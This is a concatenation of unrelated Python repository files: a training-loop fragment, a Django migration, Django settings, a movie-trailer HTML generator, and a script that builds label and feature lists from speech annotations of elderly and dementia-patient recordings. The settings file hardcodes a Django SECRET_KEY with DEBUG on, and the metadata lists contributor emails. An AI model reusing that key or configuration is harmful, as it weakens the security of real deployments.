mini_info['loss_start'].append(loss_start.data.cpu().numpy())
mini_info['loss_end'].append(loss_end.data.cpu().numpy())
mini_info['loss'].append(loss.data.cpu().numpy())
val_info['loss_action'].append(np.mean(mini_info['loss_action']))
val_info['loss_start'].append(np.mean(mini_info['loss_start']))
val_info['loss_end'].append(np.mean(mini_info['loss_end']))
val_info['loss'].append(np.mean(mini_info['loss']))
print 'Epoch-{} Train Loss: Action - {:.2f}, Start - {:.2f}, ' \
'End - {:.2f}'.format(epoch, train_info['loss_action'][-1], train_info['loss_start'][-1], train_info['loss_end'][-1])
print 'Epoch-{} Val Loss: Action - {:.2f}, Start - {:.2f}, ' \
'End - {:.2f}'.format(epoch, val_info['loss_action'][-1], val_info['loss_start'][-1], val_info['loss_end'][-1])
if val_info['loss'][-1] < best_val_cost:
best_val_cost = val_info['loss'][-1]
torch.save(tem.state_dict(), '{}/TEM/tem_model_best.pth'.format(opt.experiment)) | [
"guiliangke@gmail.com"
] | guiliangke@gmail.com |
78e2690ca6affdf275c214b4c8f9884fc3ca4e1a | 5125fbfc8556773187a91e91bb50e141b394cee1 | /companies/migrations/0009_auto__add_field_company_contact_first_name__add_field_company_contact_.py | 7ea138a9d5e9416bee252a2161bf043253ac3997 | [] | no_license | bitwurx/foundation | 5233ee73e0654e79c4ad137355782179449f7c12 | 96807382d6a0f0e7acd1acaf66cf1acbf19618e5 | HEAD | 2016-09-08T00:39:47.207991 | 2015-12-08T06:15:15 | 2015-12-08T06:15:15 | 21,710,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,644 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Company.contact_first_name'
db.add_column(u'companies_company', 'contact_first_name',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, db_index=True),
keep_default=False)
# Adding field 'Company.contact_last_name'
db.add_column(u'companies_company', 'contact_last_name',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
# Adding field 'Company.contact_title'
db.add_column(u'companies_company', 'contact_title',
self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Company.contact_first_name'
db.delete_column(u'companies_company', 'contact_first_name')
# Deleting field 'Company.contact_last_name'
db.delete_column(u'companies_company', 'contact_last_name')
# Deleting field 'Company.contact_title'
db.delete_column(u'companies_company', 'contact_title')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'companies.company': {
'Meta': {'object_name': 'Company'},
'added_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'address2': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'best_time_to_call': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'call_access_level': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True'}),
'comments': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'contact_first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'contact_last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'contact_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'employee_count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'infoconnect_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '8', 'db_index': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'db_index': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Profile']", 'null': 'True', 'blank': 'True'}),
'sales_volume': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'active'", 'max_length': '10'}),
'tags': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'db_index': 'True'})
},
u'companies.listfield': {
'Meta': {'object_name': 'ListField'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'relation': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'companies.profile': {
'Meta': {'object_name': 'Profile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'sic_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
u'companies.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['companies'] | [
"jared.p@heritageps.net"
] | jared.p@heritageps.net |
a1e3ba69bc5b5e9146bb5e74c91bcbc68d430e8c | ec2f32396b1909c9c3d01ff18d7f65aeacee3b14 | /Chalys/settings.py | 41ea7ff114d7c7e44acf58c93c50933ecded7016 | [] | no_license | GabdoDoni/Chalys | f9449efdc857bd830eb591b91474633c4937278e | 59f87729bc8b38b94d02e72b84c7b4c0662b57bd | refs/heads/master | 2023-04-02T03:30:34.467973 | 2021-03-21T09:29:17 | 2021-03-21T09:29:17 | 335,055,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,209 | py | """
Django settings for Chalys project.
Generated by 'django-admin startproject' using Django 3.1.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'n7b6q-2nn9+nrmb*w&e2e$73#d)w92uh8wmgbgm%lixyjdixaa'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Auth',
'Content'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Chalys.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Chalys.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static-cdn') | [
"dannygabdullin@gmail.com"
] | dannygabdullin@gmail.com |
3812ac255b2112a6b77ba7829762d5001dd82f22 | 4bef5f8d6ccde9a3a1e6601dfc7c96712f8c040d | /DNDsite/wsgi.py | a5c42334ea69375e3f28a6c281800fbf575878d0 | [] | no_license | VincentiSean/RPG-Character-Replicator | afbeb6af86a356cf43532fdd224a2e2c9966e96c | c1dd4ad585ae2519eed8daaa450688191ef6318d | refs/heads/master | 2023-07-18T18:11:08.602307 | 2020-06-23T16:12:43 | 2020-06-23T16:12:43 | 259,712,131 | 0 | 0 | null | 2021-09-22T19:16:16 | 2020-04-28T17:55:58 | JavaScript | UTF-8 | Python | false | false | 407 | py | """
WSGI config for DNDsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DNDsite.settings')
application = get_wsgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
11b6cb8b9f951c062114d905870c08f521449138 | c3df5e23564d7471a92242d4af9e9903ae3dca69 | /fresh_tomatoes.py | b1a60e7f1c5c5a7849db065eec5677a7273d3517 | [] | no_license | sukhdevsinghsaggar/movie-trailer-website | 4aba26b8f3df2b88f2a8b9377dee76d33cefc5c6 | a7aaa43ea973445aa8e8ada28a08e2a5bf4d69ee | refs/heads/master | 2021-01-20T02:54:58.826999 | 2017-04-26T10:12:48 | 2017-04-26T10:12:48 | 89,467,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,578 | py | import webbrowser
import os
import re
# Styles and scripting for the page
main_page_head = '''
<head>
<meta charset="utf-8">
<title>Fresh Tomatoes!</title>
<!-- Bootstrap 3 -->
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap.min.css">
<link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/css/bootstrap-theme.min.css">
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.0/js/bootstrap.min.js"></script>
<style type="text/css" media="screen">
@import url('https://fonts.googleapis.com/css?family=Permanent+Marker|Sigmar+One');
body {
padding-top: 80px;
background-image : url("red.jpg");
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
#trailer .modal-dialog {
margin-top: 200px;
width: 640px;
height: 480px;
}
.hanging-close {
position: absolute;
top: -12px;
right: -12px;
z-index: 9001;
}
#trailer-video {
width: 100%;
height: 100%;
}
.movie-tile {
margin-bottom: 20px;
padding-top: 20px;
border: 2px solid white;
border-spacing: 10px;
}
.movie-tile:hover {
background-color: #ff9999;
cursor: pointer;
}
.scale-media {
padding-bottom: 56.25%;
position: relative;
}
.scale-media iframe {
border: none;
height: 100%;
position: absolute;
width: 100%;
left: 0;
top: 0;
background-color: white;
}
.navbar-default {
background-color: #002b80;
border-color: #2ECD71;
}
.navbar-brand {
float:none;
}
.main_font {
font-family: 'Sigmar One', cursive;
font-size: 40px;
font-color: #FFFFFF;
position: relative;
}
.title {
font-family: 'Permanent Marker', cursive;
color:white;
}
</style>
<script type="text/javascript" charset="utf-8">
// Pause the video when the modal is closed
$(document).on('click', '.hanging-close, .modal-backdrop, .modal', function (event) {
// Remove the src so the player itself gets removed, as this is the only
// reliable way to ensure the video stops playing in IE
$("#trailer-video-container").empty();
});
// Start playing the video whenever the trailer modal is opened
$(document).on('click', '.movie-tile', function (event) {
var trailerYouTubeId = $(this).attr('data-trailer-youtube-id')
var sourceUrl = 'http://www.youtube.com/embed/' + trailerYouTubeId + '?autoplay=1&html5=1';
$("#trailer-video-container").empty().append($("<iframe></iframe>", {
'id': 'trailer-video',
'type': 'text-html',
'src': sourceUrl,
'frameborder': 1
}));
});
// Animate in the movies when the page loads
$(document).ready(function () {
$('.movie-tile').hide().first().show("fast", function showNext() {
$(this).next("div").show(500, showNext);
});
});
</script>
</head>
'''
# The main page layout and title bar
main_page_content = '''
<!DOCTYPE html>
<html lang="en">
<body>
<!-- Trailer Video Modal -->
<div class="modal" id="trailer">
<div class="modal-dialog">
<div class="modal-content">
<a href="#" class="hanging-close" data-dismiss="modal" aria-hidden="true">
<img src="https://lh5.ggpht.com/v4-628SilF0HtHuHdu5EzxD7WRqOrrTIDi_MhEG6_qkNtUK5Wg7KPkofp_VJoF7RS2LhxwEFCO1ICHZlc-o_=s0#w=24&h=24"/>
</a>
<div class="scale-media" id="trailer-video-container">
</div>
</div>
</div>
</div>
<!-- Main Page Content -->
<div class="container">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<div class ="container">
<a class="navbar-brand text-center center-block" href="#">
<p class ="main_font">
Fresh Tomatoes Movie Trailers
</p>
</a>
</div>
</div>
</div>
</div>
</div>
<div class="container">
{movie_tiles}
</div>
</body>
</html>
'''
# A single movie entry html template
movie_tile_content = '''
<div class="col-md-6 col-lg-4 movie-tile text-center" data-trailer-youtube-id="{trailer_youtube_id}" data-toggle="modal" data-target="#trailer">
<img src="{poster_image_url}" width="220" height="342">
<h2><div class="title">{movie_title}</div></h2>
</div>
'''
def create_movie_tiles_content(movies):
# The HTML content for this section of the page
content = ''
for movie in movies:
# Extract the youtube ID from the url
youtube_id_match = re.search(r'(?<=v=)[^&#]+', movie.trailer_youtube_url)
youtube_id_match = youtube_id_match or re.search(r'(?<=be/)[^&#]+', movie.trailer_youtube_url)
trailer_youtube_id = youtube_id_match.group(0) if youtube_id_match else None
# Append the tile for the movie with its content filled in
content += movie_tile_content.format(
movie_title=movie.title,
poster_image_url=movie.poster_image_url,
trailer_youtube_id=trailer_youtube_id
)
return content
def open_movies_page(movies):
# Create or overwrite the output file
output_file = open('fresh_tomatoes.html', 'w')
# Replace the placeholder for the movie tiles with the actual dynamically generated content
rendered_content = main_page_content.format(movie_tiles=create_movie_tiles_content(movies))
# Output the file
output_file.write(main_page_head + rendered_content)
output_file.close()
# open the output file in the browser
url = os.path.abspath(output_file.name)
webbrowser.open('file://' + url, new=2) # open in a new tab, if possible
| [
"noreply@github.com"
] | noreply@github.com |
19dd673a90c9ec6237545a1952da4b4915109306 | 8bad2a70c25ab007ef16de33f49acaf4c5e15287 | /TextGridProcess.py | 39bd1c5d01251a4a5c2140c3693909a0181dd9c4 | [] | no_license | PanJingshen/ScriptForDataMark | 2ed2a7265aebb0c67283c979452d0d2c38b46bb3 | 05a6edf8df09257a4217b5a4de4efeff89435ae9 | refs/heads/master | 2020-04-12T15:32:53.203338 | 2018-12-20T14:16:41 | 2018-12-20T14:16:41 | 162,584,768 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,396 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from typing import List
from praatio import tgio
from DataCheck import get_data_list
import re
import shutil
import os
import wave
# ========================== Paragrams ================================
# ------------------------ Edit Paragrams --------------------------
path = '/Users/panjingshen/SIAT/OldVoice/DataMark/data_mark/' \
'N_053_guolaixiang_M_20180723_mono/' \
'N_053_guolaixiang_M_20180723_mono_PD/' \
'N_053_guolaixiang_M_20180723_mono_PD_01.TextGrid'
# data_path = '/Users/panjingshen/SIAT/OldVoice/label_9.25/normal/'
# data_path = '/Users/panjingshen/Downloads/MCI/'
# data_path = '/Users/panjingshen/Downloads/ljm-mark/'
# data_path = '/Users/panjingshen/SIAT/OldVoice/DataMark/data_mark/'
# data_path = '/Users/panjingshen/SIAT/OldVoice/anno_data copy/'
data_path = '/Users/panjingshen/Downloads/AD/'
dir_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_20181029/'
# dir_path = 'label_mci_v1/'
# mark_path = 'label_temp_v1/'
# mark_path = '/Users/panjingshen/SIAT/OldVoice/label_9.25/normal/'
mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_20181029/'
# mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_mci_v1/'
# mark_path = '/Users/panjingshen/workspace/ScriptForDataMark/label_temp_v2/'
# filter module
state_Normal = ['N']
state_MCI = ['M']
state_AD = ['A']
state_List = ['N', 'M', 'A']
# filter module
module_List4U = ['PD', 'SI', 'SR', 'SS']
module_List4F = ['PD', 'SI', 'SR', 'SS', 'SF']
module_List4R = ['PD', 'SI', 'SS']
module_filterList = ['PN', 'PR', 'SF', 'AC', 'ST']
module_List = ['PD', 'SI', 'SR', 'SS', 'PN', 'PR', 'SF', 'AC', 'ST']
# filter number
num_filerList = []
num_List4Dev = [24, 26, 27, 28, 31, 32, 33, 34, 35, 36, 37, 38, 40, 41, 42, 45, 46, 48, 53, 56]
num_List4Test = [1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 18, 19, 21, 22, 23, 25]
num_List4Train = [43, 44, 47, 49, 50, 51, 52, 54, 57, 58, 59, 60]
num_List4MCI = [5, 15, 17, 20, 29, 30, 39, 55]
num_List4AD = [1, 2, 3, 4]
num_List = [i for i in range(1, 65)]
num_List4AllexptTrain = [x for x in num_List if x not in num_List4Train]
# content_filterList = ['(())', '[V', '[D', '【', '】', '(', ')', '~', '[']
char_filterList = ['(())', '[V', '[D', '【', '】', '(', ')', '~', '[', 'pa', 'da', 'ka']
# generate label.txt
L_version = '_v4'
L_fileName4Test = 'test_L' + L_version + '.txt'
L_fileName4Test_PD = 'test_L_PD' + L_version + '.txt'
L_fileName4Test_SI = 'test_L_SI' + L_version + '.txt'
L_fileName4Test_SR = 'test_L_SR' + L_version + '.txt'
L_fileName4Test_SS = 'test_L_SS' + L_version + '.txt'
L_fileName4Test_SF = 'test_L_SF' + L_version + '.txt'
L_fileName4Train = 'train_L'+ L_version +'.txt'
L_fileName4Train_SF = 'train_L_SF' + L_version + '.txt'
L_fileName4Dev = 'dev_L'+ L_version +'.txt'
L_fileName4Dev_SF = 'dev_L_SF' + L_version + '.txt'
L_fimeName4All = 'dct/L_all' + L_version + '.txt'
L_fileName = L_fileName4Test
# generate MarkCheck.txt
mark_check_version = '_v3'
# mark_checkList = ['[' + chr(i) for i in range(97, 123)] # 小写字母
mark_checkList = ['?']
mark_check_fileName = 'MarkCheck' + mark_check_version + '.txt'
# generate standard.mlf
mlf_version = '_v1'
mlf_filterList = char_filterList
mlf_fileName = 'standard' + mlf_version + '.mlf'
mlf_version4Dev = '_dev_v4'
mlf_fileName4Dev = 'standard' + mlf_version4Dev + '.mlf'
mlf_version4Test = '_test_v4'
mlf_fileName4Test = 'standard' + mlf_version4Test + '.mlf'
mlf_version4MCI = '_mci_v4'
mlf_fileName4MCI = 'standard' + mlf_version4MCI + '.mlf'
mlf_version4AD = '_ad_v4'
mlf_fileName4AD = 'standard' + mlf_version4AD + '.mlf'
# generate Elder.scp
scp_version = '_v4'
scp_fileName = 'Elder' + scp_version + '.scp'
scp_version4Dev = '_dev'+ scp_version
scp_fileName4Dev = 'Elder' + scp_version4Dev + '.scp'
scp_version4Test = '_test'+ scp_version
scp_fileName4Test = 'Elder' + scp_version4Test + '.scp'
scp_version4MCI = '_mci'+ scp_version
scp_fileName4MCI = 'Elder' + scp_version4MCI + '.scp'
scp_version4AD = '_ad'+ scp_version
scp_fileName4AD = 'Elder' + scp_version4AD + '.scp'
scp_version4SF = '_SF'+ scp_version
scp_fileName4SF = 'Elder' + scp_version4SF + '.scp'
scp_fileName4SF4AD = 'Elder' + scp_version4SF + '_ad' + '.scp'
scp_fileName4SFnotTrain = 'Elder' + scp_version4SF + '_notTrain' + '.scp'
# feat path
feat4Dev = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-dev/data/old_dev/pap/feat/'
feat4Test = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-test/data/old_test/pap/feat/'
feat4MCI = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-mci/data/old_mci/pap/feat/'
feat4AD = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-ad/data/old_ad/pap/feat/'
feat4SF = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-sf/data/old_sf/pap/feat/'
feat4ST = '.pap=/mnt/shareEx/shizhuqing/yanquanlei/gen-feat-old-st/data/old_all/pap/feat/'
# generate StartEndCheck.txt
se_check_version = '_v1'
se_fileName = 'StartEndCheck' + se_check_version + '.txt'
# ------------------------ Stable Paragrams --------------------------
# ========================== File Process ================================
# ------------------------ Path Access --------------------------
def get_filePaths(dir):
"""
获取文件夹下所有目录
:param dir: str
:return: list
"""
filePaths = list()
fileNames = os.listdir(dir)
for fileName in fileNames:
if '.TextGrid' in fileName:
filePaths.append(dir + fileName)
return filePaths
def get_filePaths1(dir):
"""
获取文件夹下所有目录
:param dir: str
:return: list
"""
filePaths = list()
fileNames = os.listdir(dir)
os.path.walk()
for fileName in fileNames:
if '.TextGrid' in fileName:
filePaths.append(dir + fileName)
return filePaths
# ------------------------ Path Filter --------------------------
def ste_filter_paths(file_list, state_list=state_List):
"""
根据状态过滤文件列表,在文件列表的通过
:param file_list: list
:param sta_list: list
:return: list
"""
file_filtered_list = list()
for file_path in file_list:
sta = get_fileState(file_path)
if sta in state_list:
file_filtered_list.append(file_path)
return file_filtered_list
def num_filter_paths(file_list, num_list=num_List):
"""
根据序号列表过滤文件列表,在文件列表的通过
:param file_list: list
:param num_list: list
:return: list
"""
file_filtered_list = list()
for path in file_list:
num = get_fileNum(path)
if num in num_list:
file_filtered_list.append(path)
return file_filtered_list
def mdl_filter_paths(file_list, module_list=module_List):
"""
根据模块过滤文件列表
:param file_list: list
:param module_list: list
:return: list
"""
file_filtered_list = list()
for file_path in file_list:
module = get_fileModule(file_path) # 文件名:N_053_guolaixiang_M_20180723_mono_PD
if module in module_list:
file_filtered_list.append(file_path)
return file_filtered_list
def pathFilter(path_list, ste_list=state_List, num_list=num_List, mdl_list=module_List):
path_list = ste_filter_paths(path_list, ste_list)
# print('ste Filter: ' + str(path_list))
path_list = num_filter_paths(path_list, num_list)
# print('Num Filter: ' + str(path_list))
path_list = mdl_filter_paths(path_list, mdl_list)
# print('Mdl Filter: ' + str(path_list))
return path_list
# ------------------------ Path Process -----------------------
def get_fileName(filePath):
"""
根据路径获得文件名(不含文件类型)
:param filePath: str
:return: str
"""
return filePath.split('/')[-1].split('.')[0]
def get_fileState(filePath):
"""
根据路径获得被试状态(Normal/MCI/AD)
:param filePath: str
:return: str
"""
return filePath.split('/')[-1].split('_')[0]
def get_fileModule(filePath):
"""
根据路径获得文件模块
:param filePath: str
:return: str
"""
module = filePath.split('/')[-1].split('_')[6]
return module
def get_fileNum(filePath):
"""
根据路径获得文件序号
:param filePath: str
:return: str
"""
# print(filePath)
# return int(filePath.split('/')[-1][2:5])
return int(filePath.split('/')[-1].split('_')[1])
# ------------------------ File Write -----------------------
def writeLines2File(fileName, lines, firstLine = None, encoding= 'utf-8'):
with open(fileName, 'w', encoding=encoding) as f:
if firstLine != None:
# f.write(firstLine + '\n')
f.write(firstLine + '\n')
for line in lines:
f.write(line + '\n')
# f.write(line)
return f
# ------------------------ File Copy -----------------------
def copyFile2Dir(file_path, dir_path):
"""
拷贝文件到对应目录下
:param file_path: str, 原文件目录
:param dir_path: str, 目标目录, eg. 'dir/'
"""
fileName = get_fileName(file_path)
shutil.copyfile(file_path, dir_path + fileName + '.TextGrid')
def copyFiles2Dir(file_pathList, dir_path):
"""
批量拷贝文件到对应目录下
:param file_pathList: 原文件目录列表
:param dir_path: str, 目标目录, eg. 'dir/'
"""
for file_path in file_pathList:
copyFile2Dir(file_path, dir_path)
# ========================== Data Access ================================
# ------------------lable.txt --------------------
# *********** 根据单个文件名获取label内容 *******************
def get_labelList_from_textgrid(path):
tg = tgio.openTextgrid(path)
firstTier = tg.tierDict[tg.tierNameList[0]]
labelList = [[entry[0], entry[1], entry[2]] for entry in firstTier.entryList]
return labelList
# *********** 根据文件名列表获取label内容 *******************
def get_labelList_from_textgrids(path_list):
labelList = list()
for path in path_list:
labels = get_labelList_from_textgrid(path)
for label in labels:
labelList.append(label)
return labelList
def get_labels(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName=L_fileName):
"""
获取标注内容,生成test.txt or train.txt
:param dir_path: list
:param modules: list
:param nums: list
:param fileName: str
"""
data_dirs = get_filePaths(dir_path)
data_dirs.sort()
# print('Before filter:' + str(data_dirs))
data_dirs = pathFilter(data_dirs, ste_list=states, mdl_list=modules, num_list=nums)
# print('After filter:' + str(data_dirs))
label_list = get_labelList_from_textgrids(data_dirs)
label_list = filter_sentence(label_list, filterList=mlf_filterList)
label_list.sort()
with open(fileName, 'w', encoding='gbk') as f:
for label in label_list:
f.write(label[2] + '\n')
# ========================== Data Check ================================
def filter_sentence(labelList, filterList=mlf_filterList):
"""
过滤有中文字符的句子
:param labelList: list
:param filterList: list
:return: list
"""
filtered_labelList = removePinyin(labelList)
new_labelList= list()
for label in filtered_labelList:
if has_illegal_char(label[2], filterList) != True:
print(label)
new_labelList.append(label)
return new_labelList
def has_illegal_char(checked_str, check_list=mlf_filterList):
for char in check_list:
if char in checked_str:
return True
return False
def removePinyin(labelList):
new_labelList = list()
pattern = re.compile(r'\[([a-z0-9])+\]')
for label in labelList:
